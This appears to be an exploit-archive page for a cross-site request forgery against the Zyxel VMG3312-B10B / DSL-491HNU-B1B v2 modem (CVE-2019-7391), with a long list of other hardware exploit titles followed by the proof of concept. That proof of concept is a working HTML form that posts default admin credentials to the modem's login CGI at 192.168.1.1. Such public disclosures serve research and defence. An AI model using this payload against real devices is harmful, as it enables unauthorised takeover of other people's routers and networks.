Menu

"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery"

Author

"Yusuf Furkan"

Platform

hardware

Release date

2019-02-05

Release Date Title Type Platform Author
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
2019-01-28 "AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2019-01-24 "Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-28 "Sricam gSOAP 2.8 - Denial of Service" dos hardware "Andrew Watson"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal" webapps hardware "Pasquale Turi"
2019-01-16 "FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure" webapps hardware "Julio Ureña"
2019-01-14 "Lenovo R2105 - Cross-Site Request Forgery (Command Execution)" webapps hardware "Nathu Nandwani"
2019-01-14 "Across DR-810 ROM-0 - Backup File Disclosure" webapps hardware SajjadBnd
2019-01-14 "Hootoo HT-05 - Remote Code Execution (Metasploit)" remote hardware "Andrei Manole"
2019-01-09 "ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting" webapps hardware "Nathu Nandwani"
2019-01-09 "Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin)" webapps hardware SajjadBnd
2019-01-07 "Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)" webapps hardware "Nathu Nandwani"
2018-12-14 "Huawei Router HG532e - Command Execution" webapps hardware Rebellion
2018-12-14 "Cisco RV110W - Password Disclosure / Command Execution" remote hardware RySh
2018-12-11 "ZTE ZXHN H168N - Improper Access Restrictions" webapps hardware "Usman Saeed"
2018-12-11 "Huawei B315s-22 - Information Leak" webapps hardware "Usman Saeed"
2018-12-11 "TP-Link wireless router Archer C1200 - Cross-Site Scripting" webapps hardware "Usman Saeed"
2018-12-04 "NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage" webapps hardware hyp3rlinx
2018-12-04 "Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass" webapps hardware Luca.Chiou
2018-12-03 "Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting" webapps hardware Luca.Chiou
2018-11-30 "Schneider Electric PLC - Session Calculation Authentication Bypass" webapps hardware Photubias
2018-11-26 "Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal" webapps hardware "numan türle"
2018-11-26 "Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials" webapps hardware Hodorsec
2018-11-27 "Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)" remote hardware Metasploit
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-12 "D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery" webapps hardware hyp3rlinx
2018-11-12 "TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)" webapps hardware Wadeek
2018-11-05 "Virgin Media Hub 3.0 Router - Denial of Service (PoC)" webapps hardware "Ross Inman"
2018-11-02 "Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel" local hardware "Billy Brumley"
2018-10-30 "NETGEAR WiFi Router R6120 - Credential Disclosure" webapps hardware Wadeek
2018-10-12 "D-Link Routers - Directory Traversal" webapps hardware "Blazej Adamczyk"
2018-10-12 "D-Link Routers - Plaintext Password" webapps hardware "Blazej Adamczyk"
2018-10-12 "D-Link Routers - Command Injection" webapps hardware "Blazej Adamczyk"
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-16 "Heatmiser Wifi Thermostat 1.7 - Credential Disclosure" webapps hardware d0wnp0ur
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-11 "Phoenix Contact WebVisit 6.40.00 - Password Disclosure" webapps hardware Photubias
2018-10-11 "WAGO 750-881 01.09.18 - Cross-Site Scripting" webapps hardware SecuNinja
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-05 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-10-03 "RICOH MP C1803 JPN Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-03 "Airties AIR5342 1.0.0.18 - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-01 "Billion ADSL Router 400G 20151105641 - Cross-Site Scripting" webapps hardware cakes
2018-09-25 "RICOH MP C406Z Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP 305+ Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C6503 Plus Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C2003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH MP C6003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH Aficio MP 301 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "LG SuperSign EZ CMS 2.5 - Remote Code Execution" webapps hardware "Alejandro Fanjul"
2018-09-21 "Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection" webapps hardware "Simon Brannstrom"
2018-09-19 "LG SuperSign EZ CMS 2.5 - Local File Inclusion" webapps hardware "Alejandro Fanjul"
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting" webapps hardware cakes
2018-09-12 "LG Smart IP Camera 1508190 - Backup File Download" webapps hardware "Ege Balci"
2018-09-12 "CirCarLife SCADA 4.3.0 - Credential Disclosure" webapps hardware SadFud
2018-09-10 "LW-N605R 12.20.2.1486 - Remote Code Execution" webapps hardware "Nassim Asrir"
2018-09-07 "QNAP Photo Station 5.7.0 - Cross-Site Scripting" webapps hardware "Mitsuaki Shiraishi"
2018-09-06 "D-Link Dir-600M N150 - Cross-Site Scripting" webapps hardware "PUNIT DARJI"
2018-08-31 "Vox TG790 ADSL Router - Cross-Site Scripting" webapps hardware cakes
2018-08-30 "DLink DIR-601 - Credential Disclosure" webapps hardware "Kevin Randall"
2018-08-29 "Episerver 7 patch 4 - XML External Entity Injection" webapps hardware "Jonas Lejon"
2018-08-27 "Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection" webapps hardware "Yorick Koster"
2018-08-27 "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)" webapps hardware "Ismail Tasdelen"
2018-08-24 "Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-08-22 "Geutebrueck re_porter 16 - Cross-Site Scripting" webapps hardware "Kamil Suska"
2018-08-22 "ZyXEL VMG3312-B10B - Cross-Site Scripting" webapps hardware "Samet ŞAHİN"
2018-08-21 "Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)" webapps hardware Alfie
2018-08-17 "ADM 3.1.2RHG1 - Remote Code Execution" webapps hardware "Matthew Fulton"
2018-08-15 "ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass" webapps hardware AmnBAN
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)" webapps hardware Wadeek
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)" webapps hardware Wadeek
2018-08-22 "Geutebrueck re_porter 7.8.974.20 - Credential Disclosure" webapps hardware "Kamil Suska"
2018-08-02 "ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution" webapps hardware "Fakhri Zulkifli"
2018-07-31 "LG NAS 3718.510.a0 - Remote Command Execution" webapps hardware 0x616163
2018-09-06 "WirelessHART Fieldgate SWG70 3.0 - Directory Traversal" webapps hardware "Hamit CİBO"
2018-07-26 "Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)" webapps hardware vulnc0d3
2018-07-24 "D-link DAP-1360 - Path Traversal / Cross-Site Scripting" webapps hardware r3m0t3nu11
2018-08-17 "Mikrotik WinBox 6.42 - Credential Disclosure (golang)" webapps hardware "Maxim Yefimenko"
2018-07-23 "Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)" webapps hardware "Nathu Nandwani"
2018-07-23 "Davolink DVW 3200 Router - Password Disclosure" webapps hardware "Ankit Anubhav"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-20 "Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass" webapps hardware vulnc0d3
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-07-13 "Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery" webapps hardware t4rkd3vilz
2018-07-13 "Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload" webapps hardware "Safak Aslan"
2018-07-13 "QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities" webapps hardware "Core Security"
2018-07-16 "VelotiSmart WiFi B-380 Camera - Directory Traversal" webapps hardware "Miguel Mendez Z"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-10 "D-Link DIR601 2.02 - Credential Disclosure" webapps hardware "Thomas Zuk"
2018-07-02 "VMware NSX SD-WAN Edge < 3.1.2 - Command Injection" webapps hardware ParagonSec
2018-07-02 "Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)" webapps hardware RandoriSec
2018-06-28 "Cisco Adaptive Security Appliance - Path Traversal" webapps hardware "Yassine Aboukir"
2018-06-28 "DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting" webapps hardware "Adipta Basu"
2018-06-25 "Intex Router N-150 - Arbitrary File Upload" webapps hardware "Samrat Das"
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)" webapps hardware Wadeek
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "DIGISOL DG-BR4000NG - Cross-Site Scripting" webapps hardware "Adipta Basu"
2018-06-25 "Intex Router N-150 - Cross-Site Request Forgery (Add Admin)" webapps hardware "Samrat Das"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-06-20 "TP-Link TL-WA850RE - Remote Command Execution" webapps hardware yoresongo
2018-06-11 "Siaberry 1.2.2 - Command Injection" webapps hardware "Space Duck"
2018-06-08 "XiongMai uc-httpd 1.0.0 - Buffer Overflow" webapps hardware "Andrew Watson"
2018-06-04 "Brother HL Series Printers 1.15 - Cross-Site Scripting" webapps hardware "Huy Kha"
2018-05-31 "TAC Xenta 511/911 - Directory Traversal" webapps hardware "Marek Cybul"
2018-05-29 "NUUO NVRmini2 / NVRsolo - Arbitrary File Upload" webapps hardware M3@Pandas
2018-05-28 "TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass" webapps hardware "BlackFog Team"
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-09-05 "Tenda ADSL Router D152 - Cross-Site Scripting" webapps hardware "Sandip Dey"
2018-05-23 "SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change" webapps hardware "Safak Aslan"
2018-05-22 "Nordex N149/4.0-4.5 - SQL Injection" webapps hardware t4rkd3vilz
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-20 "D-Link DSL-3782 - Authentication Bypass" webapps hardware "Giulio Comi"
2018-05-18 "Cisco SA520W Security Appliance - Path Traversal" webapps hardware "Nassim Asrir"
2018-05-17 "Intelbras NCLOUD 300 1.0 - Authentication bypass" webapps hardware "Pedro Aguiar"
2018-05-10 "Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery" webapps hardware "Raffaele Sabato"
2018-03-27 "DLINK DCS-5020L - Remote Code Execution (PoC)" webapps hardware "Fidus InfoSecurity"
2018-04-26 "TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot" webapps hardware Wadeek
2018-04-18 "Lutron Quantum 2.0 - 3.2.243 - Information Disclosure" webapps hardware SadFud
2018-04-06 "FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass" webapps hardware "Noman Riffat"
2018-04-02 "Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change" webapps hardware "Todor Donev"
2018-04-02 "DLink DIR-601 - Admin Password Disclosure" webapps hardware "Kevin Randall"
2018-04-02 "VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials" webapps hardware LiquidWorm
2018-03-28 "Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change" webapps hardware "Todor Donev"
2018-03-23 "TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery" webapps hardware "Mans van Someren"
2018-03-20 "Coship RT3052 Wireless Router - Persistent Cross-Site Scripting" webapps hardware "Sayan Chatterjee"
2018-03-20 "Intelbras Telefone IP TIP200 LITE - Local File Disclosure" webapps hardware anhax0r
2018-03-16 "Contec Smart Home 4.15 - Unauthorized Password Reset" webapps hardware Z3ro0ne
2018-03-02 "D-Link DIR-600M Wireless - Cross-Site Scripting" webapps hardware "Prasenjit Kanti Paul"
2017-11-27 "ZTE ZXDSL 831CII - Improper Access Restrictions" webapps hardware "Ibad Shah"
2017-11-17 "Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting" webapps hardware "Keith Thome"
2017-10-17 "TP-Link WR940N - (Authenticated) Remote Code" webapps hardware "Fidus InfoSecurity"
2017-10-12 "TP-Link TL-MR3220 - Cross-Site Scripting" webapps hardware "Thiago Sena"
2017-10-12 "Dreambox Plugin BouquetEditor - Cross-Site Scripting" webapps hardware "Thiago Sena"
2017-09-27 "NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution" webapps hardware "Kacper Szurek"
2017-10-03 "Fiberhome AN5506-04-F - Command Injection" webapps hardware Tauco
2017-10-02 "NPM-V (Network Power Manager) 2.4.1 - Password Reset" webapps hardware "Saeed reza Zamanian"
2017-09-24 "HBGK DVR 3.0.0 build20161206 - Authentication Bypass" webapps hardware "RAT - ThiefKing"
2017-09-28 "Roteador Wireless Intelbras WRN150 - Autentication Bypass" webapps hardware "Elber Tavares"
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Stream Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera FC-S/PT - Command Injection" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Information Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution" webapps hardware LiquidWorm
2017-09-18 "iBall ADSL2+ Home Router - Authentication Bypass" webapps hardware "Gem George"
2017-09-15 "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass" webapps hardware "Gem George"
2017-09-14 "Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass" webapps hardware Kivson
2017-09-12 "D-Link DIR-8xx Routers - Local Firmware Upload" webapps hardware embedi
2017-09-12 "D-Link DIR-8xx Routers - Root Remote Code Execution" webapps hardware embedi
2017-09-12 "D-Link DIR-8xx Routers - Leak Credentials" webapps hardware embedi
2017-09-11 "WiseGiga NAS - Multiple Vulnerabilities" webapps hardware "Pierre Kim"
2017-09-05 "FiberHome ADSL AN1020-25 - Improper Access Restrictions" webapps hardware "Ibad Shah"
2017-09-07 "Huawei HG255s - Directory Traversal" webapps hardware "Ahmet Mersin"
2017-09-07 "Roteador Wireless Intelbras WRN150 - Cross-Site Scripting" webapps hardware "Elber Tavares"
2017-09-04 "Wireless Repeater BE126 - Remote Code Execution" webapps hardware "Hay Mizrachi"
2017-08-29 "Brickcom IP Camera - Credentials Disclosure" webapps hardware "Emiliano Ipar"
2017-08-29 "D-Link DIR-600 - Authentication Bypass" webapps hardware "Jithin D Kurup"
2017-08-12 "AirMaster 3000M - Multiple Vulnerabilities" webapps hardware "Mr.8Th BiT"
2017-08-12 "RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)" webapps hardware "Touhid M.Shaikh"
2017-08-08 "Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution" webapps hardware "Kacper Szurek"
2017-08-03 "Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting" webapps hardware "Geolado giolado"
2017-08-01 "SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection" webapps hardware "Andy Tan"
2017-07-28 "FortiOS < 5.6.0 - Cross-Site Scripting" webapps hardware patryk_bogdan
2017-07-20 "VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass" webapps hardware Viktoras
2017-07-18 "Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)" webapps hardware xort
2017-07-14 "WDTV Live SMP 2.03.20 - Remote Password Reset" webapps hardware Sw1tCh
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass" webapps hardware LiquidWorm
2017-07-11 "DataTaker DT80 dEX 1.50.012 - Information Disclosure" webapps hardware "Nassim Asrir"
2017-07-10 "Pelco Sarix/Spectra Cameras - Remote Code Execution" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting" webapps hardware LiquidWorm
2017-07-03 "OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution" webapps hardware "Jonatas Fil"
2017-06-30 "Humax HG100R 2.0.6 - Backup File Download" webapps hardware gambler
Release Date Title Type Platform Author
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"

Unfortunately we've not tracked down any possible victims.

Ads

# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2

<html>
  <!-- CSRF PoC - generated by Yusuf -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/login/login-page.cgi" method="POST">
      <input type="hidden" name="AuthName" value="admin" />
      <input type="hidden" name="AuthPassword" value="1234" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>